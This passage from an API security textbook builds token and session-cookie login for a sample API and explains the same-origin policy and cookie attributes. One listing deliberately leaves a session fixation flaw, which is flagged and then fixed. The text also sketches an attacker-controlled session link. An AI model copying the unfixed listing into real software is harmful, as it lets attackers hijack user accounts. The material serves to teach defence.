the natter.js file you just created. Copy in the HTML from listing 4.2, and click Save.
The HTML includes the natter.js script you just created and displays the simple
HTML form with fields for typing the space name and owner of the new space to be
created. You can style the form with CSS if you want to make it a bit less ugly. The CSS
in the listing just ensures that each form field is on a new line by filling up all remaining space with a large margin.
Listing 4.2 The Natter UI HTML
<!DOCTYPE html>
<html>
<head>
    <title>Natter!</title>
    <!-- Include the natter.js script file. -->
    <script type="text/javascript" src="natter.js"></script>
    <!-- Style the form as you wish using CSS. -->
    <style type="text/css">
        input { margin-right: 100% }
    </style>
</head>
<body>
    <h2>Create Space</h2>
    <!-- The HTML form has an ID and some simple fields. -->
    <form id="createSpace">
        <label>Space name: <input name="spaceName" type="text"
            id="spaceName">
        </label>
        <label>Owner: <input name="owner" type="text" id="owner">
        </label>
        <button type="submit">Create</button>
    </form>
</body>
</html>
4.1.2 Intercepting form submission
Because web browsers do not know how to submit JSON to a REST API, you need to instruct the browser to call your createSpace function when the form is submitted instead of its default behavior. To do this, you can add more JavaScript to intercept the submit event for the form and call the function. You also need to suppress the default behavior to prevent the browser trying to directly submit the form to the server. Listing 4.3 shows the code to implement this. Open the natter.js file you created earlier in your text editor and copy the code from the listing into the file after the existing createSpace function.
The code in the listing first registers a handler for the load event on the window object, which will be called after the document has finished loading. Inside that event handler, it then finds the form element and registers a new handler to be called when the form is submitted. The form submission handler first suppresses the browser default behavior, by calling the .preventDefault() method on the event object, and then calls your createSpace function with the values from the form. Finally, the function returns false to prevent the event being further processed.
Listing 4.3 Intercepting the form submission
window.addEventListener('load', function(e) {
    // When the document loads, add an event listener
    // to intercept the form submission.
    document.getElementById('createSpace')
        .addEventListener('submit', processFormSubmit);
});
function processFormSubmit(e) {
    // Suppress the default form behavior.
    e.preventDefault();
    let spaceName = document.getElementById('spaceName').value;
    let owner = document.getElementById('owner').value;
    // Call our API function with values from the form.
    createSpace(spaceName, owner);
    return false;
}
4.1.3 Serving the HTML from the same origin
If you try to load the HTML file directly in your web browser from the file system to try it out, you’ll find that nothing happens when you click the submit button. If you open the JavaScript Console in your browser (from the View menu in Chrome, select Developer and then JavaScript Console), you’ll see an error message like that shown in figure 4.2. The request to the Natter API was blocked because the file was loaded from a URL that looks like file:///Users/neil/natter-api/src/main/resources/public/natter.html, but the API is being served from a server on https://localhost:4567/.
By default, browsers allow JavaScript to send HTTP requests only to a server on the same origin that the script was loaded from. This is known as the same-origin policy (SOP) and is an important cornerstone of web browser security. To the browser, a file URL and an HTTPS URL are always on different origins, so it will block the request. In chapter 5, you’ll see how to fix this with cross-origin resource sharing (CORS), but for now let’s get Spark to serve the UI from the same origin as the Natter API.
DEFINITION
The origin of a URL is the combination of the protocol, host, and port components of the URL. If no port is specified in the URL, then a default port is used for the protocol. For HTTP the default port is 80, while for HTTPS it is 443. For example, the origin of the URL https://www.google.com/search has protocol = https, host = www.google.com, and port = 443. Two URLs have the same origin if the protocol, host, and port all exactly match each other.
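To make the definition concrete, here is a small illustrative helper (hypothetical, not part of the Natter code) that computes the origin of a URL with java.net.URI, filling in the default port when none is given:
import java.net.URI;
class Origins {
    static String originOf(String url) {
        var uri = URI.create(url);
        // getPort() returns -1 when the URL does not specify a port,
        // in which case the protocol's default applies.
        var port = uri.getPort() != -1 ? uri.getPort()
            : "https".equals(uri.getScheme()) ? 443 : 80;
        return uri.getScheme() + "://" + uri.getHost() + ":" + port;
    }
}
By this rule, https://www.google.com/search and https://www.google.com:443/ share an origin, while http://www.google.com/ does not, because both the protocol and the default port differ.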
Figure 4.2
An error message in the JavaScript console when loading the HTML page directly. The request was
blocked because the local file is considered to be on a separate origin to the API, so browsers will block the
request by default.
To instruct Spark to serve your HTML and JavaScript files, you add a staticFiles
directive to the main method where you have configured the API routes. Open
Main.java in your text editor and add the following line to the main method. It must
come before any other route definitions, so put it right at the start of the main
method as the very first line:
Spark.staticFiles.location("/public");
The same-origin policy
The same-origin policy (SOP) is applied by web browsers to decide whether to allow
a page or script loaded from one origin to interact with other resources. It applies
when other resources are embedded within a page, such as by HTML <img> or
<script> tags, and when network requests are made through form submissions or
by JavaScript. Requests to the same origin are always allowed, but requests to a dif-
ferent origin, known as cross-origin requests, are often blocked based on the policy.
The SOP can be surprising and confusing at times, but it is a critical part of web secu-
rity so it’s worth getting familiar with as an API developer. Many browser APIs avail-
able to JavaScript are also restricted by origin, such as access to the HTML document
itself (via the document object model, or DOM), local data storage, and cookies. The
Mozilla Developer Network has an excellent article on the SOP at
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy.
Broadly speaking, the SOP will allow many requests to be sent from one origin to
another, but it will stop the initiating origin from being able to read the response.
For example, if JavaScript loaded from https://www.alice.com makes a POST
request to http://bob.net, then the request will be allowed (subject to the condi-
tions described below), but the script will not be able to read the response or even
see whether it was successful. Embedding a resource using an HTML tag such as <img>,
<video>, or <script> is generally allowed, and in some cases this can reveal
some information about the cross-origin response to a script, such as whether the
resource exists or its size.
Only certain HTTP requests are permitted cross-origin by default, and other requests
will be blocked completely. Allowed requests must be either a GET, POST, or HEAD
request and can contain only a small number of allowed headers on the request, such
as Accept and Accept-Language headers for content and language negotiation. A
Content-Type header is allowed, but may only take one of three simple values:

- application/x-www-form-urlencoded
- multipart/form-data
- text/plain
These are the same three content types that can be produced by an HTML form ele-
ment. Any deviation from these rules will result in the request being blocked. Cross-
origin resource sharing (CORS) can be used to relax these restrictions, as you’ll learn
in chapter 5.
This instructs Spark to serve any files that it finds in the src/main/resources/
public folder.
TIP
Static files are copied during the Maven compilation process, so you will
need to rebuild and restart the API using mvn clean compile exec:java to
pick up any changes to these files.
Once you have configured Spark and restarted the API server, you will be able to
access the UI from https://localhost:4567/natter.html. Type in any value for the new
space name and owner and then click the Submit button. Depending on your browser,
you will be presented with a screen like that shown in figure 4.3 prompting you for a
username and password.
So, where did this come from? Because your JavaScript client did not supply a user-
name and password on the REST API request, the API responded with a standard
HTTP 401 Unauthorized status and a WWW-Authenticate header prompting for
authentication using the Basic scheme. The browser understands the Basic authenti-
cation scheme, so it pops up a dialog box automatically to prompt the user for a user-
name and password.
Create a user with the same name as the space owner using curl at the command
line if you have not already created one, by running:
curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}'\
https://localhost:4567/users
and then type in the name and password to the box, and click Sign In. If you check
the JavaScript Console you will see that the space has now been created.
Figure 4.3
Chrome prompt for username and password produced automatically
when the API asks for HTTP Basic authentication
If you now create another space, you will see that the browser doesn’t prompt for the
password again but that the space is still created. Browsers remember HTTP Basic cre-
dentials and automatically send them on subsequent requests to the same URL path
and to other endpoints on the same host and port that are siblings of the original URL.
That is, if the password was originally sent to https://api.example.com:4567/a/b/c,
then the browser will send the same credentials on requests to
https://api.example.com:4567/a/b/d, but would not send them on a request to
https://api.example.com:4567/a or other endpoints.
4.1.4 Drawbacks of HTTP authentication
Now that you’ve implemented a simple UI for the Natter API using HTTP Basic
authentication, it should be apparent that it has several drawbacks from both a user
experience and engineering point of view. Some of the drawbacks include the
following:
- The user's password is sent on every API call, increasing the chance of it accidentally being exposed by a bug in one of those operations. If you are implementing a microservice architecture (covered in chapter 10), then every microservice needs to securely handle those passwords.
- Verifying a password is an expensive operation, as you saw in chapter 3, and performing this validation on every API call adds a lot of overhead. Modern password-hashing algorithms are designed to take around 100ms for interactive logins, which limits your API to handling 10 operations per CPU core per second. You're going to need a lot of CPU cores if you need to scale up with this design!
- The dialog box presented by browsers for HTTP Basic authentication is pretty ugly, with not much scope for customization. The user experience leaves a lot to be desired.
- There is no obvious way for the user to ask the browser to forget the password. Even closing the browser window may not work, and it often requires configuring advanced settings or completely restarting the browser. On a public terminal, this is a serious security problem if the next user can visit pages using your stored password just by clicking the Back button.
For these reasons, HTTP Basic authentication and other standard HTTP auth
schemes (see sidebar) are not often used for APIs that must be accessed from web
browser clients. On the other hand, HTTP Basic authentication is a simple solution
for APIs that are called from command-line utilities and scripts, such as system admin-
istrator APIs, and has a place in service-to-service API calls that are covered in part 4,
where no user is involved at all and passwords can be assumed to be strong.
4.2 Token-based authentication
Let’s suppose that your users are complaining about the drawbacks of HTTP Basic
authentication in your API and want a better authentication experience. The CPU
overhead of all this password hashing on every request is killing performance and
driving up energy costs too. What you want is a way for users to log in once and then be
trusted for the next hour or so while they use the API. This is the purpose of token-
based authentication, and in the form of session cookies has been a backbone of web
development since very early on. When a user logs in by presenting their username
and password, the API will generate a random string (the token) and give it to the cli-
ent. The client then presents the token on each subsequent request, and the API can
look up the token in a database on the server to see which user is associated with that
session. When the user logs out, or the token expires, it is deleted from the database,
and the user must log in again if they want to keep using the API.
HTTP Digest and other authentication schemes
HTTP Basic authentication is just one of several authentication schemes that are sup-
ported by HTTP. The most common alternative is HTTP Digest authentication, which
sends a salted hash of the password instead of sending the raw value. Although this
sounds like a security improvement, the hashing algorithm used by HTTP Digest,
MD5, is considered insecure by modern standards and the widespread adoption of
HTTPS has largely eliminated its advantages. Certain design choices in HTTP Digest
also prevent the server from storing the password more securely, because the weakly-
hashed value must be available. An attacker who compromises the database there-
fore has a much easier job than they would if a more secure algorithm had been used.
If that wasn’t enough, there are several incompatible variants of HTTP Digest in use.
You should avoid HTTP Digest authentication in new applications.
While there are a few other HTTP authentication schemes, most are not widely used.
The exception is the more recent HTTP Bearer authentication scheme introduced by
OAuth2 in RFC 6750 (https://tools.ietf.org/html/rfc6750). This is a flexible token-
based authentication scheme that is becoming widely used for API authentication.
HTTP Bearer authentication is discussed in detail in chapters 5, 6, and 7.
Pop quiz

1  Given a request to an API at https://api.example.com:8443/test/1, which of
   the following URIs would be running on the same origin according to the same-
   origin policy?

   a  http://api.example.com/test/1
   b  https://api.example.com/test/2
   c  http://api.example.com:8443/test/2
   d  https://api.example.com:8443/test/2
   e  https://www.example.com:8443/test/2

The answer is at the end of the chapter.
NOTE
Some people use the term token-based authentication only when referring
to non-cookie tokens covered in chapter 5. Others are even more exclusive
and only consider the self-contained token formats of chapter 6 to be real
tokens.
To switch to token-based authentication, you’ll introduce a dedicated new login end-
point. This endpoint could be a new route within an existing API or a brand-new API
running as its own microservice. If your login requirements are more complicated,
you might want to consider using an authentication service from an open source or
commercial vendor; but for now, you’ll just hand-roll a simple solution using user-
name and password authentication as before.
Token-based authentication is a little more complicated than the HTTP Basic
authentication you have used so far, but the basic flow, shown in figure 4.4, is quite
simple. Rather than send the username and password directly to each API endpoint,
the client instead sends them to a dedicated login endpoint. The login endpoint veri-
fies the username and password and then issues a time-limited token. The client then
includes that token on subsequent API requests to authenticate. The API endpoint
can validate the token because it is able to talk to a token store that is shared between
the login endpoint and the API endpoint.
Figure 4.4
In token-based authentication, the client first makes a request to a dedicated
login endpoint with the user's credentials. In response, the login endpoint returns a time-
limited token. The client then sends that token on requests to other API endpoints that
use it to authenticate the user. API endpoints can validate the token by looking it up in
the token database.
In the simplest case, this token store is a shared database indexed by the token ID,
but more advanced (and loosely coupled) solutions are also possible, as you’ll see in
chapter 6. A short-lived token that is intended to authenticate a user while they are
directly interacting with a site (or API) is often referred to as a session token, session
cookie, or just session.
For web browser clients, there are several ways you can store the token on the cli-
ent. Traditionally, the only option was to store the token in an HTTP cookie, which
the browser remembers and sends on subsequent requests to the same site until the
cookie expires or is deleted. You’ll implement cookie-based storage in the rest of this
chapter and learn how to protect cookies against common attacks. Cookies are still a
great choice for first-party clients running on the same origin as the API they are talking
to but can be difficult when dealing with third-party clients and clients hosted on other
domains. In chapter 5, you will implement an alternative to cookies using HTML 5
local storage that solves these problems, but with new challenges of its own.
DEFINITION
A first-party client is a client developed by the same organization
or company that develops an API, such as a web application or mobile app.
Third-party clients are developed by other companies and are usually less
trusted.
4.2.1 A token store abstraction
In this chapter and the next two, you’re going to implement several storage options
for tokens with different pros and cons, so let’s create an interface now that will let
you easily swap out one solution for another. Figure 4.5 shows the TokenStore inter-
face and its associated Token class as a UML class diagram. Each token has an associ-
ated username and an expiry time, and a collection of attributes that you can use to
associate information with the token, such as how the user was authenticated or other
details that you want to use to make access control decisions. Creating a token in the
store returns its ID, allowing different store implementations to decide how the token
should be named. You can later look up a token by ID, and you can use the Optional
class to handle the fact that the token might not exist, either because the user passed
an invalid ID in the request or because the token has expired.
<<interface>> TokenStore
    + create(token: Token): String
    + read(tokenId: String): Optional<Token>

Token (a TokenStore holds 0..* Tokens)
    + username : String
    + expiry : Instant
    + attributes : Map<String, String>

Figure 4.5
A token store has operations to create a token, returning its ID, and to look
up a token by ID. A token itself has an associated username, an expiry time, and a set
of attributes.
The code to create the TokenStore interface and Token class is given in listing 4.4.
As in the UML diagram, there are just two operations in the TokenStore interface for
now. One is for creating a new token, and another is for reading a token given its ID.
You’ll add another method to revoke tokens in section 4.6. For simplicity and concise-
ness, you can use public fields for the attributes of the token. Because you’ll be writing
more than one implementation of this interface, let’s create a new package to hold
them. Navigate to src/main/java/com/manning/apisecurityinaction and create a
new folder named “token”. In your text editor, create a new file TokenStore.java in the
new folder and copy the contents of listing 4.4 into the file, and click Save.
Listing 4.4
The TokenStore abstraction

package com.manning.apisecurityinaction.token;

import java.time.*;
import java.util.*;
import java.util.concurrent.*;

import spark.Request;

public interface TokenStore {
    // A token can be created and then later looked up by token ID.
    String create(Request request, Token token);
    Optional<Token> read(Request request, String tokenId);

    // A token has an expiry time, an associated username,
    // and a set of attributes.
    class Token {
        public final Instant expiry;
        public final String username;
        public final Map<String, String> attributes;

        public Token(Instant expiry, String username) {
            this.expiry = expiry;
            this.username = username;
            // Use a concurrent map if the token will be
            // accessed from multiple threads.
            this.attributes = new ConcurrentHashMap<>();
        }
    }
}
In section 4.3, you’ll implement a token store based on session cookies, using Spark’s
built-in cookie support. Then in chapters 5 and 6 you’ll see more advanced imple-
mentations using databases and encrypted client-side tokens for high scalability.
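Before the cookie-based implementation, it may help to see the abstraction in action. The following is a minimal in-memory sketch, not one of the book's implementations: the InMemoryTokenStore name, the ConcurrentHashMap storage, and the SecureRandom-based ID generation are illustrative assumptions, and the Request parameter is simply ignored.

package com.manning.apisecurityinaction.token;

import java.security.SecureRandom;
import java.util.Base64;
import java.util.Optional;
import java.util.concurrent.ConcurrentHashMap;

import spark.Request;

public class InMemoryTokenStore implements TokenStore {
    private final ConcurrentHashMap<String, Token> tokens =
            new ConcurrentHashMap<>();
    private final SecureRandom random = new SecureRandom();

    @Override
    public String create(Request request, Token token) {
        // Generate an unguessable, 160-bit random token ID.
        var bytes = new byte[20];
        random.nextBytes(bytes);
        var tokenId = Base64.getUrlEncoder().withoutPadding()
                .encodeToString(bytes);
        tokens.put(tokenId, token);
        return tokenId;
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // An unknown (or already-deleted) ID yields an empty Optional.
        return Optional.ofNullable(tokens.get(tokenId));
    }
}

Note that expired tokens are never purged in this sketch; a real store would also need to delete tokens once they expire.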
4.2.2 Implementing token-based login
Now that you have an abstract token store, you can write a login endpoint that uses
the store. Of course, it won’t work until you implement a real token store backend,
but you’ll get to that soon in section 4.3.
As you’ve already implemented HTTP Basic authentication, you can reuse that
functionality to implement token-based login. By registering a new login endpoint
and marking it as requiring authentication, using the existing UserController filter,
the client will be forced to authenticate with HTTP Basic to call the new login end-
point. The user controller will take care of validating the password, so all our new
endpoint must do is look up the subject attribute in the request and construct a token
based on that information, as shown in figure 4.6.
The ability to reuse the existing HTTP Basic authentication mechanism makes the
implementation of the login endpoint very simple, as shown in listing 4.5. To implement
token-based login, navigate to src/main/java/com/manning/apisecurityinaction/
controller and create a new file TokenController.java. The new controller should
take a TokenStore implementation as a constructor argument. This will allow you to
swap out the token storage backend without altering the controller implementation.
As the actual authentication of the user will be taken care of by the existing User-
Controller, all the TokenController needs to do is pull the authenticated user sub-
ject out of the request attributes (where it was set by the UserController) and create
a new token using the TokenStore. You can set whatever expiry time you want for the
tokens, and this will control how frequently the user will be forced to reauthenticate.
In this example it’s hard-coded to 10 minutes for demonstration purposes. Copy the
contents of listing 4.5 into the new TokenController.java file, and click Save.
Figure 4.6
The user controller authenticates the user with HTTP Basic
authentication as before. If that succeeds, then the request continues to the
token login endpoint, which can retrieve the authenticated subject from the
request attributes. Otherwise, the request is rejected because the endpoint
requires authentication.
Listing 4.5
Token-based login

package com.manning.apisecurityinaction.controller;

import java.time.temporal.ChronoUnit;
import org.json.JSONObject;
import com.manning.apisecurityinaction.token.TokenStore;
import spark.*;
import static java.time.Instant.now;

public class TokenController {
    private final TokenStore tokenStore;

    // Inject the token store as a constructor argument.
    public TokenController(TokenStore tokenStore) {
        this.tokenStore = tokenStore;
    }

    public JSONObject login(Request request, Response response) {
        // Extract the subject username from the request and
        // pick a suitable expiry time.
        String subject = request.attribute("subject");
        var expiry = now().plus(10, ChronoUnit.MINUTES);

        // Create the token in the store and return the
        // token ID in the response.
        var token = new TokenStore.Token(expiry, subject);
        var tokenId = tokenStore.create(request, token);

        response.status(201);
        return new JSONObject()
            .put("token", tokenId);
    }
}
You can now wire up the TokenController as a new endpoint that clients can call to
login and get a session token. To ensure that users have authenticated using the User-
Controller before they hit the TokenController login endpoint, you should add the
new endpoint after the existing authentication filters. Given that logging in is an
important action from a security point of view, you should also make sure that calls to
the login endpoint are logged by the AuditController as for other endpoints. To add
the new login endpoint, open the Main.java file in your editor and add lines to create
a new TokenController and expose it as a new endpoint, as in listing 4.6. Because you
don’t yet have a real TokenStore implementation, you can pass a null value to the
TokenController for now. Rather than have a /login endpoint, we’ll treat session
tokens as a resource and treat logging in as creating a new session resource. There-
fore, you should register the TokenController login method as the handler for a POST
request to a new /sessions endpoint. Later, you will implement logout as a DELETE
request to the same endpoint.
Listing 4.6
The login endpoint

// Create the new TokenController, at first with a null TokenStore.
TokenStore tokenStore = null;
var tokenController = new TokenController(tokenStore);

// Ensure the user is authenticated by the UserController first.
before(userController::authenticate);

// Calls to the login endpoint should be logged,
// so make sure that also happens first.
var auditController = new AuditController(database);
before(auditController::auditRequestStart);
afterAfter(auditController::auditRequestEnd);

// Reject unauthenticated requests before the
// login endpoint can be accessed.
before("/sessions", userController::requireAuthentication);
post("/sessions", tokenController::login);
Once you’ve added the code to wire up the TokenController, it’s time to write a real
implementation of the TokenStore interface. Save the Main.java file, but don’t try to
test it yet because it will fail.
4.3 Session cookies
The simplest implementation of token-based authentication, and one that is widely
implemented on almost every website, is cookie-based. After the user authenticates,
the login endpoint returns a Set-Cookie header on the response that instructs the
web browser to store a random session token in the cookie storage. Subsequent
requests to the same site will include the token as a Cookie header. The server can
then look up the cookie token in a database to see which user is associated with that
token, as shown in figure 4.7.
Are cookies RESTful?
One of the key principles of the REST architectural style is that interactions between
the client and the server should be stateless. That is, the server should not store any
client-specific state between requests. Cookies appear to violate this principle
because the server stores state associated with the cookie for each client. Early uses
of session cookies included using them as a place to store temporary state such as
a shopping cart of items that have been selected by the user but not yet paid for.
These abuses of cookies often broke expected behavior of web pages, such as the
behavior of the back button or causing a URL to display differently for one user com-
pared to another.
When used purely to indicate the login state of a user at an API, session cookies are
a relatively benign violation of the REST principles, and they have many security attri-
butes that are lost when using other technologies. For example, cookies are associ-
ated with a domain, so the browser ensures that they are not accidentally sent to
other sites. They can also be marked as Secure, which prevents the cookie being acci-
dentally sent over a non-HTTPS connection where it might be intercepted. I therefore
think that cookies still have an important role to play for APIs that are designed to
serve browser-based clients served from the same origin as the API. In chapter 6,
you'll learn about alternatives to cookies that do not require the server to maintain
any per-client state, and in chapter 9, you'll learn how to use capability URIs for a
more RESTful solution.
Cookie-based sessions are so widespread that almost every web framework for any lan-
guage has built-in support for creating such session cookies, and Spark is no excep-
tion. In this section you’ll build a TokenStore implementation based on Spark’s
session cookie support. To access the session associated with a request, you can use the
request.session() method:
Session session = request.session(true);
Spark will check to see if a session cookie is present on the request, and if so, it will
look up any state associated with that session in its internal database. The single boolean
argument indicates whether you would like Spark to create a new session if one does
not yet exist. To create a new session, you pass a true value, in which case Spark will
generate a new session token and store it in its database. It will then add a Set-Cookie
header to the response. If you pass a false value, then Spark will return null if there
is no Cookie header on the request with a valid session token.
Figure 4.7
In session cookie authentication, after the user logs in the server
sends a Set-Cookie header on the response with a random session token. On
subsequent requests to the same server, the browser will send the session token
back in a Cookie header, which the server can then look up in the token store to
access the session state.
Because we can reuse the functionality of Spark’s built-in session management,
the implementation of the cookie-based token store is almost trivial, as shown in list-
ing 4.7. To create a new token, you can simply create a new session associated with the
request and then store the token attributes as attributes of the session. Spark will take
care of storing these attributes in its session database and setting the appropriate Set-
Cookie header. To read tokens, you can just check to see if a session is associated with
the request, and if so, populate the Token object from the attributes on the session.
Again, Spark takes care of checking if the request has a valid session Cookie header
and looking up the attributes in its session database. If there is no valid session cookie
associated with the request, then Spark will return a null session object, which you
can then return as an Optional.empty() value to indicate that no token is associated
with this request.
To create the cookie-based token store, navigate to src/main/java/com/manning/
apisecurityinaction/token and create a new file named CookieTokenStore.java. Type
in the contents of listing 4.7, and click Save.
WARNING
This code suffers from a vulnerability known as session fixation.
You’ll fix that shortly in section 4.3.1.
Listing 4.7
The cookie-based TokenStore

package com.manning.apisecurityinaction.token;

import java.util.Optional;
import spark.Request;

public class CookieTokenStore implements TokenStore {

    @Override
    public String create(Request request, Token token) {
        // WARNING: session fixation vulnerability!
        // Pass true to request.session() to create a new session cookie.
        var session = request.session(true);

        // Store token attributes as attributes of the session cookie.
        session.attribute("username", token.username);
        session.attribute("expiry", token.expiry);
        session.attribute("attrs", token.attributes);

        return session.id();
    }

    @Override
    public Optional<Token> read(Request request, String tokenId) {
        // Pass false to request.session() to check if a valid
        // session is present.
        var session = request.session(false);
        if (session == null) {
            return Optional.empty();
        }

        // Populate the Token object with the session attributes.
        var token = new Token(session.attribute("expiry"),
                session.attribute("username"));
        token.attributes.putAll(session.attribute("attrs"));
        return Optional.of(token);
    }
}
You can now wire up the TokenController to a real TokenStore implementation. Open
the Main.java file in your editor and find the lines that create the TokenController.
Replace the null argument with an instance of the CookieTokenStore as follows:
TokenStore tokenStore = new CookieTokenStore();
var tokenController = new TokenController(tokenStore);
Save the file and restart the API. You can now try out creating a new session. First cre-
ate a test user if you have not done so already:
$ curl -H 'Content-Type: application/json' \
-d '{"username":"test","password":"password"}' \
https://localhost:4567/users
{"username":"test"}
You can then call the new /sessions endpoint, passing in the username and password
with curl's -u option, which sends them as HTTP Basic authentication credentials,
to get a new session cookie:
$ curl -i -u test:password \
-H 'Content-Type: application/json' \
-X POST https://localhost:4567/sessions
HTTP/1.1 201 Created
Date: Sun, 19 May 2019 09:42:43 GMT
Set-Cookie: JSESSIONID=node0hwk7s0nq6wvppqh0wbs0cha91.node0;Path=/;Secure;HttpOnly
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Cache-Control: no-store
Server:
Transfer-Encoding: chunked
{"token":"node0hwk7s0nq6wvppqh0wbs0cha91"}
Notice that Spark returns a Set-Cookie header for the new session token and that
the TokenController also returns the token ID in the response body.
4.3.1 Avoiding session fixation attacks
The code you’ve just written suffers from a subtle but widespread security flaw that
affects all forms of token-based authentication, known as a session fixation attack. After
the user authenticates, the CookieTokenStore then asks for a new session by calling
request.session(true). If the request did not have an existing session cookie, then
this will create a new session. But if the request already contains an existing session
cookie, then Spark will return that existing session and not create a new one. This can
create a security vulnerability if an attacker is able to inject their own session cookie
into another user’s web browser. Once the victim logs in, the API will change the user-
name attribute in the session from the attacker’s username to the victim’s username.
The attacker’s session token now allows them to access the victim’s account, as shown in
figure 4.8. Some web servers will produce a session cookie as soon as you access the
login page, allowing an attacker to obtain a valid session cookie before they have even
logged in.
DEFINITION
A session fixation attack occurs when an API fails to generate a new
session token after a user has authenticated. The attacker captures a session
token from loading the site on their own device and then injects that token into the
victim's browser. Once the victim logs in, the attacker can use the original session
token to access the victim's account.
Figure 4.8
In a session fixation attack, the attacker first logs in to obtain a valid session token. They then
inject that session token into the victim's browser and trick them into logging in. If the existing session is not
invalidated during login, then the attacker's session will be able to access the victim's account.
Browsers will prevent a site hosted on a different origin from setting cookies for your
API, but there are still ways that session fixation attacks can be exploited. First, if the
attacker can exploit an XSS attack on your domain, or any sub-domain, then they can
use this to set a cookie. Second, Java servlet containers, which Spark uses under the
hood, support different ways to store the session token on the client. The default, and
safest, mechanism is to store the token in a cookie. But you can also configure the
servlet container to store the session by rewriting URLs produced by the site to
include the session token in the URL itself. Such URLs look like the following:
https://api.example.com/users/jim;JSESSIONID=l8Kjd…
The ;JSESSIONID=… bit is added by the container and is parsed out of the URL on sub-
sequent requests. This style of session storage makes it much easier for an attacker to
carry out a session fixation attack because they can simply lure the user to click on a
link like the following:
https://api.example.com/login;JSESSIONID=<attacker-controlled-session>
If you use a servlet container for session management, you should ensure that the ses-
sion tracking-mode is set to COOKIE in your web.xml, as in the following example:
<session-config>
<tracking-mode>COOKIE</tracking-mode>
</session-config>
This is the default in the Jetty container used by Spark. You can prevent session fixa-
tion attacks by ensuring that any existing session is invalidated after a user authenti-
cates. This ensures that a new random session identifier is generated, which the
attacker is unable to guess. The attacker’s session will be logged out. Listing 4.8 shows
the updated CookieTokenStore. First, you should check if the client has an existing
session cookie by calling request.session(false). This instructs Spark to return the
existing session, if one exists, but will return null if there is not an existing session.
Invalidate any existing session to ensure that the next call to request.session(true)
will create a new one. To eliminate the vulnerability, open CookieTokenStore.java in
your editor and update the login code to match listing 4.8.
Listing 4.8
Preventing session fixation attacks

@Override
public String create(Request request, Token token) {
    // Check if there is an existing session and invalidate it.
    var session = request.session(false);
    if (session != null) {
        session.invalidate();
    }
    // Create a fresh session that is unguessable to the attacker.
    session = request.session(true);
    session.attribute("username", token.username);
    session.attribute("expiry", token.expiry);
    session.attribute("attrs", token.attributes);
    return session.id();
}
4.3.2 Cookie security attributes
As you can see from the output of curl, the Set-Cookie header generated by Spark sets
the JSESSIONID cookie to a random token string and sets some attributes on the
cookie to limit how it is used:
Set-Cookie: JSESSIONID=node0hwk7s0nq6wvppqh0wbs0cha91.node0;Path=/;Secure;HttpOnly
There are several standard attributes that can be set on a cookie to prevent accidental
misuse. Table 4.1 lists the most useful attributes from a security point of view.
Table 4.1
Cookie security attributes

Secure
    Secure cookies are only ever sent over a HTTPS connection and so cannot be stolen
    by network eavesdroppers.

HttpOnly
    Cookies marked HttpOnly cannot be read by JavaScript, making them slightly
    harder to steal through XSS attacks.

SameSite
    SameSite cookies will only be sent on requests that originate from the same origin
    as the cookie. SameSite cookies are covered in section 4.4.

Domain
    If no Domain attribute is present, then a cookie will only be sent on requests to the
    exact host that issued the Set-Cookie header. This is known as a host-only cookie. If
    you set a Domain attribute, then the cookie will be sent on requests to that domain
    and all sub-domains. For example, a cookie with Domain=example.com will be sent
    on requests to api.example.com and www.example.com. Older versions of the cookie
    standards required a leading dot on the domain value to include subdomains (such
    as Domain=.example.com), but this is the only behavior in more recent versions and
    so any leading dot is ignored. Don't set a Domain attribute unless you really need the
    cookie to be shared with subdomains.

Path
    If the Path attribute is set to /users, then the cookie will be sent on any request to a
    URL that matches /users or any sub-path such as /users/mary, but not on a request
    to /cats/mrmistoffelees. The Path defaults to the parent of the request that returned
    the Set-Cookie header, so you should normally explicitly set it to / if you want the
    cookie to be sent on all requests to your API. The Path attribute has limited security
    benefits, as it is easy to defeat by creating a hidden iframe with the correct path and
    reading the cookie through the DOM.

Expires and Max-Age
    Sets the time at which the cookie expires and should be forgotten by the client,
    either as an explicit date and time (Expires) or as the number of seconds from now
    (Max-Age). Max-Age is newer and preferred, but Internet Explorer only understands
    Expires. Setting the expiry to a time in the past will delete the cookie immediately. If
    you do not set an explicit expiry time or max-age, then the cookie will live until the
    browser is closed.
You should always set cookies with the most restrictive attributes that you can get away
with. The Secure and HttpOnly attributes should be set on any cookie used for secu-
rity purposes. Spark produces Secure and HttpOnly session cookies by default. Avoid
setting a Domain attribute unless you absolutely need the same cookie to be sent to
multiple sub-domains, because if just one sub-domain is compromised then an
attacker can steal your session cookies. Sub-domains are often a weak point in web
security due to the prevalence of sub-domain hijacking vulnerabilities.
DEFINITION
Sub-domain hijacking (or sub-domain takeover) occurs when an
attacker is able to claim an abandoned web host that still has valid DNS
records configured. This typically occurs when a temporary site is created on
a shared service like GitHub Pages and configured as a sub-domain of the
main website. When the site is no longer required, it is deleted but the DNS
records are often forgotten. An attacker can discover these DNS records and
re-register the site on the shared web host, under the attacker's control. They
can then serve their content from the compromised sub-domain.

Persistent cookies
A cookie with an explicit Expires or Max-Age attribute is known as a persistent cookie
and will be permanently stored by the browser until the expiry time is reached, even
if the browser is restarted. Cookies without these attributes are known as session
cookies (even if they have nothing to do with a session token) and are deleted when
the browser window or tab is closed. You should avoid adding the Max-Age or Expires
attributes to your authentication session cookies so that the user is effectively
logged out when they close their browser tab. This is particularly important on shared
devices, such as public terminals or tablets that might be used by many different peo-
ple. Some browsers will now restore tabs and session cookies when the browser is
restarted though, so you should always enforce a maximum session time on the
server rather than relying on the browser to delete cookies appropriately. You should
also consider implementing a maximum idle time, so that the cookie becomes invalid
if it has not been used for three minutes or so. Many session cookie frameworks
implement these checks for you.

Persistent cookies can be useful during the login process as a "Remember Me"
option to avoid the user having to type in their username manually, or even to auto-
matically log the user in for low-risk operations. This should only be done if trust in
the device and the user can be established by other means, such as looking at the
location, time of day, and other attributes that are typical for that user. If anything
looks out of the ordinary, then a full authentication process should be triggered. Self-
contained tokens such as JSON Web Tokens (see chapter 6) can be useful for imple-
menting persistent cookies without storing long-lived state on the server.
Some browsers also support naming conventions for cookies that enforce that the
cookie must have certain security attributes when it is set. This prevents accidental
mistakes when setting cookies and ensures an attacker cannot overwrite the cookie
with one with weaker attributes. These cookie name prefixes are likely to be incorpo-
rated into the next version of the cookie specification. To activate these defenses, you
should name your session cookie with one of the following two special prefixes:

